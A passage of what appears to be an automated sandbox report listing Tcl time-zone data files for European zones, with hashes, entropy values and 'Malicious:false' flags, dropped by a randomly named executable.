                                                                                                                                                                                                                              SHA1:AF7226DF81C2B3C3A5832F59FC708A6BCBF389CA
                                                                                                                                                                                                                              SHA-256:8F395352AA05D35E7D13380E73659A0D5B56FFC17E3F4E40E4F678A902F0E49B
                                                                                                                                                                                                                              SHA-512:B82E0CFA5EDA0FCDF03609AE439255F8937A7E9EFA0AFE15EA8877316782AFC74514BCD2B4F06F1B5F0F3C5A64A933D73CB50D5AED2BB1491BD6CACBB77B10E8
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Samara) {.. {-9223372036854775808 12020 0 LMT}.. {-1593820800 10800 0 +03}.. {-1247540400 14400 0 +04}.. {-1102305600 14400 0 +05}.. {354916800 18000 1 +05}.. {370724400 14400 0 +04}.. {386452800 18000 1 +05}.. {402260400 14400 0 +04}.. {417988800 18000 1 +05}.. {433796400 14400 0 +04}.. {449611200 18000 1 +05}.. {465343200 14400 0 +04}.. {481068000 18000 1 +05}.. {496792800 14400 0 +04}.. {512517600 18000 1 +05}.. {528242400 14400 0 +04}.. {543967200 18000 1 +05}.. {559692000 14400 0 +04}.. {575416800 18000 1 +05}.. {591141600 14400 0 +04}.. {606866400 10800 0 +04}.. {606870000 14400 1 +04}.. {622594800 10800 0 +03}.. {638319600 14400 1 +04}.. {654649200 10800 0 +03}.. {670374000 7200 0 +03}.. {670377600 10800 1 +03}.. {686102400 10800 0 +03}.. {687916800 14400 0 +04}.. {701820000 18000 1 +05}.. {717544800 14400 0 +04}.. {733
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):179
                                                                                                                                                                                                                              Entropy (8bit):4.955758257767983
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxVvjF3vXHAIgoqspvVHRL/yQawELDX7x/yQaxE:SlSWB9vsM3ymx5PHAIgoxvN/yt/yrE
                                                                                                                                                                                                                              MD5:D253DA6880630A31D39DB0CFA4933ABD
                                                                                                                                                                                                                              SHA1:E5798DAAE574729685FE489F296B964BC1CCF2E4
                                                                                                                                                                                                                              SHA-256:B6856A0E38C2404F7D5FA1821559503F8AE70923A562F0D993124D131515F395
                                                                                                                                                                                                                              SHA-512:CFB6005F3E8D1C585AF36EB7A8C9F49760EF6F446C97E7804EB61EFD0804424C4FB6AE81B71C5A867274EF89A17DAC0D2A0FF882A0F6AEA1D5FFD51593726C5F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Rome)]} {.. LoadTimeZoneFile Europe/Rome..}..set TZData(:Europe/San_Marino) $TZData(:Europe/Rome)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):189
                                                                                                                                                                                                                              Entropy (8bit):4.937834327554967
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxV/sUE2tovXHAIgoq8sUE2oAovRL/yQawEX3GEaQa5:SlSWB9vsM3ymhrE2tSHAIgohrE2LovNZ
                                                                                                                                                                                                                              MD5:F7C7DAE9C5D371EF9EE1F490246ED3CC
                                                                                                                                                                                                                              SHA1:40C388FE2A55078C8E0524A4385B3F8846960E24
                                                                                                                                                                                                                              SHA-256:BC00D953C2F3E55E40EDA13838AB66B9E9D0BDAD620E4EB917637761ABB06FB1
                                                                                                                                                                                                                              SHA-512:EB22C59F4D58D96797A718FC59B010795F587626E456D44A3E6398E0FBF4ECD97BCDC151BC1359151798B5AF2964FE5708233F8ECD0D344C3E27629F2645687F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Belgrade)]} {.. LoadTimeZoneFile Europe/Belgrade..}..set TZData(:Europe/Sarajevo) $TZData(:Europe/Belgrade)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2061
                                                                                                                                                                                                                              Entropy (8bit):3.6638125261109824
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:yFvCAs6kKR6aQmF1cSNWJjXgV/Ap40FjDQ:yhCAs6kC6aZF1cSNcjXgV/ApDFjDQ
                                                                                                                                                                                                                              MD5:CC4D7C478790588D232568CAB12D8E67
                                                                                                                                                                                                                              SHA1:07A7CFCFFFF91D124EDFC99F5053BAFC79FBB12B
                                                                                                                                                                                                                              SHA-256:AB90363DEE5077C39EC55FE8E519593FF08223E5A8E593F6CCE01FB5B8B35BAE
                                                                                                                                                                                                                              SHA-512:23944D20624C942CFDE58F1019160D64401BD0AFB8C3EC49F904038482FAA6741812548C860A2DAE050B8D17A7E08ED9C6EBE7FF19393CFA46D78B1D21B1CACA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Saratov) {.. {-9223372036854775808 11058 0 LMT}.. {-1593820800 10800 0 +03}.. {-1247540400 14400 0 +05}.. {354916800 18000 1 +05}.. {370724400 14400 0 +04}.. {386452800 18000 1 +05}.. {402260400 14400 0 +04}.. {417988800 18000 1 +05}.. {433796400 14400 0 +04}.. {449611200 18000 1 +05}.. {465343200 14400 0 +04}.. {481068000 18000 1 +05}.. {496792800 14400 0 +04}.. {512517600 18000 1 +05}.. {528242400 14400 0 +04}.. {543967200 18000 1 +05}.. {559692000 14400 0 +04}.. {575416800 10800 0 +04}.. {575420400 14400 1 +04}.. {591145200 10800 0 +03}.. {606870000 14400 1 +04}.. {622594800 10800 0 +03}.. {638319600 14400 1 +04}.. {654649200 10800 0 +03}.. {670374000 14400 0 +04}.. {701820000 10800 0 +04}.. {701823600 14400 1 +04}.. {717548400 10800 0 +03}.. {733273200 14400 1 +04}.. {748998000 10800 0 +03}.. {764722800 14400 1 +04}.. {780
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2389
                                                                                                                                                                                                                              Entropy (8bit):3.9491446081772748
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:wM2wE0xhuHJkYaVV0XOnbdSisa0ewEKGfUslIYtq8X:UwEAEpkzVFgaNl7
                                                                                                                                                                                                                              MD5:03E05E60E064198BF6562B2E6E8DA8D2
                                                                                                                                                                                                                              SHA1:51461207B671536CD4A7587BA283DE2D0017AA4A
                                                                                                                                                                                                                              SHA-256:D51CD3DE50C50BCA1624EFC952ADD15D418A09EC213760DF5BC3097E35C5A7A0
                                                                                                                                                                                                                              SHA-512:73B7773DABE19F20DD211E178B822FD35620DC4AC8B9D20259971B1157ED7A60A5A41026258FAA8B15016268D241ED804AC1307CACDA00D6FE657407D254B02C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Simferopol) {.. {-9223372036854775808 8184 0 LMT}.. {-2840148984 8160 0 SMT}.. {-1441160160 7200 0 EET}.. {-1247536800 10800 0 MSK}.. {-888894000 3600 0 CET}.. {-857257200 3600 0 CET}.. {-844556400 7200 1 CEST}.. {-828226800 3600 0 CET}.. {-812502000 7200 1 CEST}.. {-811645200 10800 0 MSD}.. {354920400 14400 1 MSD}.. {370728000 10800 0 MSK}.. {386456400 14400 1 MSD}.. {402264000 10800 0 MSK}.. {417992400 14400 1 MSD}.. {433800000 10800 0 MSK}.. {449614800 14400 1 MSD}.. {465346800 10800 0 MSK}.. {481071600 14400 1 MSD}.. {496796400 10800 0 MSK}.. {512521200 14400 1 MSD}.. {528246000 10800 0 MSK}.. {543970800 14400 1 MSD}.. {559695600 10800 0 MSK}.. {575420400 14400 1 MSD}.. {591145200 10800 0 MSK}.. {606870000 14400 1 MSD}.. {622594800 10800 0 MSK}.. {631141200 10800 0 MSK}.. {646786800 7200 0 EET}.. {701042400 7200 0 EET}.. {
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):187
                                                                                                                                                                                                                              Entropy (8bit):4.953089768975736
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxV/sUE2tovXHAIgoq8sUE2oAovRL/yQawOgpr8Qahr:SlSWB9vsM3ymhrE2tSHAIgohrE2LovNO
                                                                                                                                                                                                                              MD5:0BF8ADBB63F5D6187C75FF1B0BAC761E
                                                                                                                                                                                                                              SHA1:7DE15E767D34812F784CE6E85438A592E2CBA418
                                                                                                                                                                                                                              SHA-256:52F20858433261B15797B64F0A09CEE95D552EF93B5DAA7C141BFAB6D718C345
                                                                                                                                                                                                                              SHA-512:27D395635427C8FA1A4E0063A32F482701D2CC7C7724B4A06E661D4A419D23E219672888D37367FE5E70B6872914EB9EE034AE359DCB6A4C4CE05CA34C3589A9
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Belgrade)]} {.. LoadTimeZoneFile Europe/Belgrade..}..set TZData(:Europe/Skopje) $TZData(:Europe/Belgrade)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7654
                                                                                                                                                                                                                              Entropy (8bit):3.727428614069594
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:8lmG4+K7Gjz5CXNUatpaNlKkUpvBeRF+iDlKSdkwSMTHkB2vwz59F06Kgr/y/rYf:8lmGWwkdUasivBeRF+W35Syrwl9h5j
                                                                                                                                                                                                                              MD5:91357DFC23ADB0CE80C463E4B6D896BE
                                                                                                                                                                                                                              SHA1:273F51BE4C67A9AC1182F86AC060E963684151D5
                                                                                                                                                                                                                              SHA-256:6415F279CB143EA598CF8272263AC5B502827B10CEEB242B39E6EFCC23A2EE12
                                                                                                                                                                                                                              SHA-512:8EA7E2D4C2239879A4D6CCE302C38A6D2A9093A2CADEF4F4294E60D373AB9A2C468BA6E3D54DEC7F73D954CE5226EF2B022F8BDEF29B3B4AAB3838B05C72EA29
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Sofia) {.. {-9223372036854775808 5596 0 LMT}.. {-2840146396 7016 0 IMT}.. {-2369527016 7200 0 EET}.. {-857257200 3600 0 CET}.. {-844556400 7200 1 CEST}.. {-828226800 3600 0 CET}.. {-812502000 7200 1 CEST}.. {-796777200 3600 0 CET}.. {-788922000 3600 0 CET}.. {-781048800 7200 0 EET}.. {291762000 10800 0 EEST}.. {307576800 7200 0 EET}.. {323816400 10800 1 EEST}.. {339026400 7200 0 EET}.. {355266000 10800 1 EEST}.. {370393200 7200 0 EET}.. {386715600 10800 1 EEST}.. {401846400 7200 0 EET}.. {417571200 10800 1 EEST}.. {433296000 7200 0 EET}.. {449020800 10800 1 EEST}.. {465350400 7200 0 EET}.. {481075200 10800 1 EEST}.. {496800000 7200 0 EET}.. {512524800 10800 1 EEST}.. {528249600 7200 0 EET}.. {543974400 10800 1 EEST}.. {559699200 7200 0 EET}.. {575424000 10800 1 EEST}.. {591148800 7200 0 EET}.. {606873600 10800 1 EEST}.. {62259
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):184
                                                                                                                                                                                                                              Entropy (8bit):4.956798438511978
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxV/y+YF3vXHAIgoq8yFRRL/yQawRMNSTyQahyuv:SlSWB9vsM3ymhVoPHAIgoh6N/yqMNSTm
                                                                                                                                                                                                                              MD5:ACFB8E2D1D4BA0D2D46410F2F2823B21
                                                                                                                                                                                                                              SHA1:4AC3A19E94DE606DFF7D93BC6C7F113F3D2D083A
                                                                                                                                                                                                                              SHA-256:64615AEA9EF14A2609D2C804901281C83FDDC0A8BCA9B377D6CAD62D81801C66
                                                                                                                                                                                                                              SHA-512:2E23AC0DE7D3D0CF2BA4FE3EE31E15EB614A7442097578209D38CE2FF2E3DF006881463866FE67DD4DDEAB179E5CD2946E8A9E8F7401F1B953E9AB216EC753F0
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Berlin)]} {.. LoadTimeZoneFile Europe/Berlin..}..set TZData(:Europe/Stockholm) $TZData(:Europe/Berlin)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7549
                                                                                                                                                                                                                              Entropy (8bit):3.76585669030767
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:dUusEpkjXkSV3AMaNlKkUpvBeRF+iDlKSdkwSMTHkB2vwz59F06Kgr/y/rYjlBK0:O0WjUSWivBeRF+W35Syrwl9h5j
                                                                                                                                                                                                                              MD5:54EF0224F5E28FA78F212EC97D4AE561
                                                                                                                                                                                                                              SHA1:FA7C9A951ED943F1E1E609D2253582016BC26B57
                                                                                                                                                                                                                              SHA-256:6F3594CCDA78B02B2EE14C8FAE29E668E47193AF2DFCF5AF1ECD210F13BCE9CE
                                                                                                                                                                                                                              SHA-512:2D1CA2BB1945AE5E3F56AF8FA7F950CE7169F215C783E683634581C5EC01B54159E47A0E9551897077BBEAB06158906029A4E4B0051A263D9E5D903EA9DA1692
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Tallinn) {.. {-9223372036854775808 5940 0 LMT}.. {-2840146740 5940 0 TMT}.. {-1638322740 3600 0 CET}.. {-1632006000 7200 1 CEST}.. {-1618700400 3600 0 CET}.. {-1593824400 5940 0 TMT}.. {-1535938740 7200 0 EET}.. {-927943200 10800 0 MSK}.. {-892954800 3600 0 CET}.. {-857257200 3600 0 CET}.. {-844556400 7200 1 CEST}.. {-828226800 3600 0 CET}.. {-812502000 7200 1 CEST}.. {-797648400 10800 0 MSD}.. {354920400 14400 1 MSD}.. {370728000 10800 0 MSK}.. {386456400 14400 1 MSD}.. {402264000 10800 0 MSK}.. {417992400 14400 1 MSD}.. {433800000 10800 0 MSK}.. {449614800 14400 1 MSD}.. {465346800 10800 0 MSK}.. {481071600 14400 1 MSD}.. {496796400 10800 0 MSK}.. {512521200 14400 1 MSD}.. {528246000 10800 0 MSK}.. {543970800 14400 1 MSD}.. {559695600 10800 0 MSK}.. {575420400 14400 1 MSD}.. {591145200 10800 0 MSK}.. {606870000 10800 1 EEST}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7675
                                                                                                                                                                                                                              Entropy (8bit):3.809498345470167
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:n05NWKIHBJ9AE4elPiIEtzsFpMbFNBwA3ybuNTjrjBDmE0DmiTcoYdNOMCsyZhlt:0iKqxAE41sFpM5vwA6Efv03TBZLl
                                                                                                                                                                                                                              MD5:1983B88075A92942209BB2B80E565F4E
                                                                                                                                                                                                                              SHA1:12A0401026C5C036144FD1D544173AAB39969F61
                                                                                                                                                                                                                              SHA-256:C62686BF598138FEFB72E8CC6632BA75A5FE147F2A30124EE3583BE1F732E38D
                                                                                                                                                                                                                              SHA-512:E95C38FA0A2B526C00B9DCF5CDF53059DECF64B085AA18BE000968DA626561944415D053CF7A5C32BC672085538920CFD67A3A3B627CFD5B1A4C9CEC49AA3F96
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Tirane) {.. {-9223372036854775808 4760 0 LMT}.. {-1767230360 3600 0 CET}.. {-932346000 7200 0 CEST}.. {-857257200 3600 0 CET}.. {-844556400 7200 1 CEST}.. {-843519600 3600 0 CET}.. {136854000 7200 1 CEST}.. {149896800 3600 0 CET}.. {168130800 7200 1 CEST}.. {181432800 3600 0 CET}.. {199839600 7200 1 CEST}.. {213141600 3600 0 CET}.. {231894000 7200 1 CEST}.. {244591200 3600 0 CET}.. {263257200 7200 1 CEST}.. {276040800 3600 0 CET}.. {294706800 7200 1 CEST}.. {307490400 3600 0 CET}.. {326156400 7200 1 CEST}.. {339458400 3600 0 CET}.. {357087600 7200 1 CEST}.. {370389600 3600 0 CET}.. {389142000 7200 1 CEST}.. {402444000 3600 0 CET}.. {419468400 7200 1 CEST}.. {433807200 3600 0 CET}.. {449622000 7200 1 CEST}.. {457480800 7200 0 CEST}.. {465354000 3600 0 CET}.. {481078800 7200 1 CEST}.. {496803600 3600 0 CET}.. {512528400 7200 1 C
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):189
                                                                                                                                                                                                                              Entropy (8bit):4.906212162381389
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxV+NM/LWXHAIgoq9NM/HARL/yQa3MPgJM1p8QagNMj:SlSWB9vsM3ymI6CHAIgoI6HAN/ytM4MO
                                                                                                                                                                                                                              MD5:E0C99DB7673EEE440BA1848046455BA1
                                                                                                                                                                                                                              SHA1:1BCCC1BE46306DEF8A9CA249DE8FA11FC57CC04D
                                                                                                                                                                                                                              SHA-256:FDD53FDB5F754BBBA8FF98F0B1555FE0BAEB7852843220A7CF93A190B641A9AD
                                                                                                                                                                                                                              SHA-512:CD56B540AE9084DEAA9D0A1DBBAF89733C465424C22CE74696B9AE90FD4FEFAB265CF23C5B13A7F04597D75FD0147BD593E0552B56D87372170CB4CA1BFC8259
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Chisinau)]} {.. LoadTimeZoneFile Europe/Chisinau..}..set TZData(:Europe/Tiraspol) $TZData(:Europe/Chisinau)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2119
                                                                                                                                                                                                                              Entropy (8bit):3.680951255407528
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:kFvCAs6kKR6aQmF1cSNWrI+AjQndgV/Ap40FjDOP:khCAs6kC6aZF1cSN4I+AjQdgV/ApDFj4
                                                                                                                                                                                                                              MD5:83C86E437B5FBA1DC9CC5235396AC381
                                                                                                                                                                                                                              SHA1:5493A59C3A5A1B55ACD493E67F9E29D2A415A8DB
                                                                                                                                                                                                                              SHA-256:9FA9D09509B4F8F5A9C8E422DBA02605070C3EBDAEB7C1DF8527C8EEF5E3632D
                                                                                                                                                                                                                              SHA-512:86222489C65C87646939DECF91C2EC336EB46F64B644526A3FA8A4854B9D11819F6FD253107AB8A3DE911E254C88092D25137442164A6E437CDAF258A7CBB66C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Ulyanovsk) {.. {-9223372036854775808 11616 0 LMT}.. {-1593820800 10800 0 +03}.. {-1247540400 14400 0 +05}.. {354916800 18000 1 +05}.. {370724400 14400 0 +04}.. {386452800 18000 1 +05}.. {402260400 14400 0 +04}.. {417988800 18000 1 +05}.. {433796400 14400 0 +04}.. {449611200 18000 1 +05}.. {465343200 14400 0 +04}.. {481068000 18000 1 +05}.. {496792800 14400 0 +04}.. {512517600 18000 1 +05}.. {528242400 14400 0 +04}.. {543967200 18000 1 +05}.. {559692000 14400 0 +04}.. {575416800 18000 1 +05}.. {591141600 14400 0 +04}.. {606866400 10800 0 +04}.. {606870000 14400 1 +04}.. {622594800 10800 0 +03}.. {638319600 14400 1 +04}.. {654649200 10800 0 +03}.. {670374000 7200 0 +03}.. {670377600 10800 1 +03}.. {686102400 7200 0 +02}.. {695779200 10800 0 +04}.. {701823600 14400 1 +04}.. {717548400 10800 0 +03}.. {733273200 14400 1 +04}.. {748
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):177
                                                                                                                                                                                                                              Entropy (8bit):5.051734481833866
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxV2cvXHAIgoq1csFARL/yQa2rUQaocqn:SlSWB9vsM3ym5HAIgoiAN/yFC
                                                                                                                                                                                                                              MD5:17A0CC51331756920B13FFA3FF556751
                                                                                                                                                                                                                              SHA1:C575FEF4F053393C57B34C7C7B0C1E9605413792
                                                                                                                                                                                                                              SHA-256:F8CAF5DBE12F1647B28E7CCDDB2E09E36788A766690D12E770A8ABD82E708644
                                                                                                                                                                                                                              SHA-512:E73F0FE5BE4DD91948A88DC895E148D81267576BA3BCFEA777E25C01EAE9C06845DBFFB651526045B70B7A3CCDB195DFFF60486C01E0A115DFB856873970008E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Kyiv)]} {.. LoadTimeZoneFile Europe/Kyiv..}..set TZData(:Europe/Uzhgorod) $TZData(:Europe/Kyiv)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):180
                                                                                                                                                                                                                              Entropy (8bit):4.953146873643623
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxVnCMPfXHAIgoqkCM4ARL/yQa1NEHp8Qa5CMS:SlSWB9vsM3ym5XPHAIgo5gAN/yvNEJ8G
                                                                                                                                                                                                                              MD5:A0BAEC8B6AF1589ECBE52667DDB2A153
                                                                                                                                                                                                                              SHA1:37093F4F885CBFA90A1F136D082E8B7546244ACC
                                                                                                                                                                                                                              SHA-256:06B235BF047FC2303102BC3DC609A5754A6103321D28440B74EEC1C9E3D24642
                                                                                                                                                                                                                              SHA-512:DBEC235AFB413FA8D116FA1AFFE73706762E7458038B6D68E0BFD71C339510D766825BA97055A06DEE14D5880EAE6CD035BFE0C935C0DF44B0107A356D293A78
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Zurich)]} {.. LoadTimeZoneFile Europe/Zurich..}..set TZData(:Europe/Vaduz) $TZData(:Europe/Zurich)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):176
                                                                                                                                                                                                                              Entropy (8bit):4.914414313741477
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxVvjF3vXHAIgoqspvVHRL/yQa1xLM1p8QaxE:SlSWB9vsM3ymx5PHAIgoxvN/yvN+8rE
                                                                                                                                                                                                                              MD5:2404265F8DE1F7D7745893DD4752BA1C
                                                                                                                                                                                                                              SHA1:C07E7F72DBDC7F5F746385523EA733C2714F5DA2
                                                                                                                                                                                                                              SHA-256:C203E94465BD1D91018FC7670437226EF9A4BB41D59DDE49095363865CA33D00
                                                                                                                                                                                                                              SHA-512:5C20834542B74041AAB1DBE35686781B32EEB5814B1A35A942E87D1FC3B6D8F9264CB90433C44A480EA86DDEA65D8C152F41CE3E983C1DE5FA74D6FB5208F701
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Rome)]} {.. LoadTimeZoneFile Europe/Rome..}..set TZData(:Europe/Vatican) $TZData(:Europe/Rome)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7930
                                                                                                                                                                                                                              Entropy (8bit):3.8193566380830273
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:8F6zq+gH74elPiIEtzsFpMbFNBwA3ybuNTjrjBDmE0DmiTcoYdNOMCsyZhltlUxo:8ozE41sFpM5vwA6Efv03TBZLl
                                                                                                                                                                                                                              MD5:6A3A8055DD67174E853C7A208BABAC9B
                                                                                                                                                                                                                              SHA1:64445543DE9D6C01FA858442976E249E37BE23EF
                                                                                                                                                                                                                              SHA-256:A8165313C9B51DAEF130401439CBA60DAA9887FC5EAA61A5AFD4F7BAD1AD934F
                                                                                                                                                                                                                              SHA-512:4407B9E8709A8DD05337A10030895AA9876EAF64EF5347952249EE2A541E304331B46D38532FD7CDFF9E633BF8C9884282F0A5ED259EBA1D99DC0914AF1A50C6
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Vienna) {.. {-9223372036854775808 3921 0 LMT}.. {-2422055121 3600 0 CET}.. {-1693706400 7200 1 CEST}.. {-1680483600 3600 0 CET}.. {-1663455600 7200 1 CEST}.. {-1650150000 3600 0 CET}.. {-1632006000 7200 1 CEST}.. {-1618700400 3600 0 CET}.. {-1577926800 3600 0 CET}.. {-1569711600 7200 1 CEST}.. {-1555801200 3600 0 CET}.. {-938905200 7200 0 CEST}.. {-857257200 3600 0 CET}.. {-844556400 7200 1 CEST}.. {-828226800 3600 0 CET}.. {-812502000 7200 1 CEST}.. {-796777200 3600 0 CET}.. {-781052400 7200 1 CEST}.. {-780188400 3600 0 CET}.. {-757386000 3600 0 CET}.. {-748479600 7200 1 CEST}.. {-733273200 3600 0 CET}.. {-717634800 7200 1 CEST}.. {-701910000 3600 0 CET}.. {-684975600 7200 1 CEST}.. {-670460400 3600 0 CET}.. {323823600 7200 1 CEST}.. {338940000 3600 0 CET}.. {347151600 3600 0 CET}.. {354675600 7200 1 CEST}.. {370400400 3600 0 CE
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7485
                                                                                                                                                                                                                              Entropy (8bit):3.7711709848169592
                                                                                                                                                                                                                              Encrypted:false
